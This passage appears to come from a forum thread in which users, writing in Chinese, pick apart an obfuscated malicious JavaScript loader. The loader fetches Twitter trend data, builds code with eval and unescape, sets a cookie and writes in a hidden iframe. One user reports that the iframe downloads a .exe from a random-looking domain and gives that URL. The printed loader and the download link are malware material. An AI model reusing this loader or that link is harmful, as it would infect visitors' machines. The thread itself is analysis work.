        document.write("<scr" + "ipt language=javascript" + " src='http://search.twitter.com/trends/daily.json?date=" + shiftIndex + "&callback=callback2'>" + "</scr" + "ipt>");
    }
    function callback2(x) {
        window.tw = x;
        sc('rf5f6ds', 2, 7);
        eval(unescape(dz + cz + op + st) + 'dw(dz+cz($a+st));');
        document.write($a);
    }
    document.write("<img src='http://search.twitter.com/images/search/rss.png' width=1 height=1 style='visibility:hidden' /> <scr" + "ipt language=javascript" + " src='http://search.twitter.com/trends/daily.json?callback=callback'>" + "</scr" + "ipt>");
} else {
    $a = ''
};

function sc(cnm, v, ed) {
    var exd = new Date();
    exd.setDate(exd.getDate() + ed);
    document.cookie = cnm + '=' + escape(v) + ';expires=' + exd.toGMTString();
};

然后是一个遍历和取消跳过分配给变量的字符串的例子(我已经开始了这个…但是现在是睡觉的时候了!)

xsznix 14 年前

如果它需要运行才能做到这一点,那么就这样吧,我猜。有人知道如何做到这一点而不损害我自己吗?

最简单的方法就是在Linux中使用Chrome。

我只是在Linux中以匿名模式通过Chrome运行了它。它看起来无害。iframe的源没有启动。

http://picasaweb.google.com/xsznix/MePwningSpam#5500978024402977090

编辑:iframe似乎加载了一个.exe文件。url每次都不一样。 http://niaijldnbvf.com/nte/PROX.exe